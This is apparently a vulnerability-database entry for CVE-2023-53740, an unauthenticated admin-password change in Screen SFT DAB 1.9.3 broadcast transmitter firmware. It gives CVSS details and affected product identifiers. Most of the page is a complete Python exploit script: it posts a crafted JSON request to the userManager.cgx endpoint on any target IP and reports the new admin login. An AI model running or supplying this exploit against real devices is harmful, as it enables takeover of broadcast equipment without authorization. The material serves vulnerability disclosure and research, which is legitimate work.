Security Vulnerability Report
CVE-2023-53740 CVSS 9.8 CRITICAL

CVE-2023-53740

Published: 2025-12-10 21:16:03
Last Modified: 2025-12-17 18:59:10

Description

Screen SFT DAB 1.9.3 contains an authentication bypass vulnerability that allows attackers to change the admin password without providing the current credentials. Attackers can exploit the userManager.cgx endpoint by sending a crafted JSON request with a new MD5-hashed password to directly modify the admin account.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dbbroadcast:sft_dab_015\/c_firmware:1.9.3:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dbbroadcast:sft_dab_015\/c:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:dbbroadcast:sft_dab_050\/c_firmware:1.9.3:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dbbroadcast:sft_dab_050\/c:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:dbbroadcast:sft_dab_150\/c_firmware:1.9.3:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dbbroadcast:sft_dab_150\/c:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:dbbroadcast:sft_dab_300\/c_firmware:1.9.3:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dbbroadcast:sft_dab_300\/c:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:dbbroadcast:sft_dab_600\/c_firmware:1.9.3:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dbbroadcast:sft_dab_600\/c:-:*:*:*:*:*:*:* - NOT VULNERABLE
Screen SFT DAB 1.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import hashlib
import json

# CVE-2023-53740 PoC - Screen SFT DAB Authentication Bypass
# Target: Screen SFT DAB 1.9.3 userManager.cgx endpoint


def generate_md5_hash(password):
    """Generate MD5 hash of the password"""
    return hashlib.md5(password.encode()).hexdigest()


def exploit(target_ip, new_password):
    """
    Exploit the authentication bypass vulnerability to change admin
    password without knowing current password
    """
    target_url = f"http://{target_ip}/userManager.cgx"

    # Generate MD5 hash of new password
    new_password_md5 = generate_md5_hash(new_password)

    # Construct malicious JSON payload
    payload = {
        "username": "admin",
        "newPassword": new_password_md5,
        "action": "changePassword"
    }

    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }

    try:
        # Send the crafted request without authentication
        response = requests.post(
            target_url,
            json=payload,
            headers=headers,
            timeout=10
        )

        print(f"[*] Target: {target_ip}")
        print(f"[*] New Password: {new_password}")
        print(f"[*] MD5 Hash: {new_password_md5}")
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response: {response.text}")

        if response.status_code == 200:
            print("[+] Password changed successfully!")
            print("[+] You can now login with username: admin, password: " + new_password)
            return True
        else:
            print("[-] Exploitation failed")
            return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    import sys

    if len(sys.argv) != 3:
        print(f"Usage: python {sys.argv[0]} <target_ip> <new_password>")
        sys.exit(1)

    target = sys.argv[1]
    password = sys.argv[2]
    exploit(target, password)
```

